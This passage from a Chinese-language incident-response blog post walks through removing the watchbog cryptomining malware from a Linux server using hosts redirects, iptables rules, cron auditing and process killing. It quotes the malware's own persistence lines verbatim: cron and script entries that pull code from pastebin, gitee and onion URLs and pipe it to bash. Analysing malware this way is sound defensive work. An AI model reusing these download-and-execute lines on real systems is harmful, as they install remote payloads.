我们可以先将上述这些地址重定向到本地
[root@localhost ~]# cat /etc/hosts 127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4 ::1 localhost localhost.localdomain localhost6 localhost6.localdomain6 127.0.0.1 ptpb.pw pastebin.com gitee.com aziplcr72qjhzvin.onion.to
2.2 防火墙控制出入流量
我们将上述被攻击者携带的域名所对应的的ip地址进行ip限制。
比如pastebin.com对应的ip为104.20.208.21
iptables -A INPUT -s 104.20.209.21 -j DROP iptables -A OUTPUT -s 104.20.209.21 -j DROP iptables -A OUTPUT -j DROP -d 104.20.209.2
保存修改内容
/sbin/service iptables save
至于其他域名为了安全起见,也将其对应的ip全部按照上述方法进行限制,另外我们通过strace追踪watchbog进程,在日志中也发现了几个可疑的ip,建议将其一并封禁。
[root@localhost ~]# strace -p 3738 ##strace追踪watchbog主进程 strace: Process 3738 attached 略 connect(11, {sa_family=AF_INET, sin_port=htons(3333), sin_addr=inet_addr("185.92.222.223")}, 16) = -1 EINPROGRESS (Operation now in progress) 略 connect(11, {sa_family=AF_INET, sin_port=htons(3333), sin_addr=inet_addr("185.92.222.223")}, 16) = -1 EINPROGRESS (Operation now in progress) 略 connect(11, {sa_family=AF_INET, sin_port=htons(3333), sin_addr=inet_addr("178.128.242.134")}, 16) = -1 EINPROGRESS (Operation now in progress)
2.3 移除curl get脚本
因为该挖矿程序会借助curl、wget命令去下载病毒,所以第一时间我们需要进行如下操作:
mv /usr/bin/curl /usr/bin/lruc mv /usr/bin/wget /usr/bin/tegw
如果确认病毒彻底被删除,我们可以不需要操作。
2.4 删掉cron里面的相关任务
crontab -l /etc/cron.d /etc/cron.deny /etc/cron.monthly /etc/cron.daily /etc/cron.hourly /etc/crontab /etc/cron.weekly
上述8个与cron相关的文件目录我们都需要仔细检查一遍,凡是有关curl pastebin.com等信息都要彻底删除。
不查不知道,一查吓一跳。
1) crontab -l
首先系统定时任务中我们就发现了。
*/9 * * * * (curl -fsSL https://pastebin.com/raw/AgdgACUD||wget -q -O- https://pastebin.com/raw/AgdgACUD||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/uiZvw xG8").read()'||curl -fsSL https://gitee.com/return_block/party_1/raw/master/main/api/README.md||wget -q -O - https://gitee.com/return_block/party_1/raw/master/main/api/README.md||curl -fsS L https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt)|bash
2)/etc/cron.d
该目录下新增了好几个命令:appache、root、system
详情如下:
3)/etc/cron.deny
没有发现
4)/etc/cron.monthly
5)/etc/cron.daily
6)/etc/cron.hourly
7)/etc/crontab
我们在crontab文件中还发现了新的潜藏命令httpntp、ftpdns
8)/etc/cron.weekly
没有发现
最后我们在用grep过滤一遍,确保完全清除干净。
2.5 删除恶意命令
同时我们还发现了恶意命令/bin/httpntp、/bin/ftpsdns、/usr/bin/watchbog
博主本人是从定时任务中发现这个恶意命令存在的。
httpntp如下:
[root@localhost ~]# vim /bin/httpntp (python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/uiZvwxG8").read()'||curl -fsSL https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvi n.onion.to/old.txt)|bash ##
ftpdns如下:
[root@localhost ~]# vim /bin/ftpdns (python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/uiZvwxG8").read()'||curl -fsSL https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvi n.onion.to/old.txt)|bash ##
watchbog如下:是一个二进制文件
[root@localhost ~]# vim /usr/bin/watchbog ^?ELF^B^A^A^C^@^@^@^@^@^@^@^@^B^@>^@^A^@^@^@°?G^@^@^@^@^@@^@^@^@^@^@^@^@PM$^@^@^@^@^@^@^@^@^@@^@8^@ ^@@^@"^@!^@^F^@^@^@^E^@^@^@@^@^@^@^@^@^@^@@^@@^@^@^@^@^@@^@@^@^@^@^@^@0^B^@^@^@^@^@^@0^B^@^@^@^@^@^@^H^@^@^@^@^@^@^@^C^@^@^@^D^@^@^@p^B^@^@^@^@^@^@p^B@^@^@^@^@^@p^B@^@^@^@^@^@^\^@^@^@^@^@^ @^@^\^@^@^@^@^@^@^@^A^@^@^@^@^@^@^@^A^@^@^@^E^@^@^@^@^@^@^@^@^@^@^@^@^@@^@^@^@^@^@^@^@@^@^@^@^@^@?ì#^@^@^@^@^@?ì#^@^@^@^@^@^@^@ ^@^@^@^@^@^A^@^@^@^F^@^@^@^X?#^@^@^@^@^@^X?<83>^@^@^@^@^@^X? <83>^@^@^@^@^@?o^@^@^@^@^@^@??^@^@^ 略
2.6 删除tmp目录下timesyncc.service文件
文件详情如下:
2.7 杀掉watchbog进程
ps -ef|grep watchbog|awk '{print $2}'|xargs kill -9
第3章 总结
面对挖矿进程我总结如下常规思路,如果遇到挖矿进程。
先后顺序如下:
1)查看定时任务,找到挖矿程序在执行的内容。
2)将恶意网址的hosts全部重定向到本地(127.0.0.1)
3)仔细查看审核与定时任务有关的文件和目录,进行清除
4)删除恶意的命令与包,重命名系统中被利用的命令
5)杀掉对应恶意进程(为什么放到最后呢?因为就算最早杀掉,其还是会因为定时任务等等自动启动)
补充:以上思路是常规思路,
也可以直接关闭crontab定时任务,然后进行上述思路一步步排查,在检查无误后,再启动
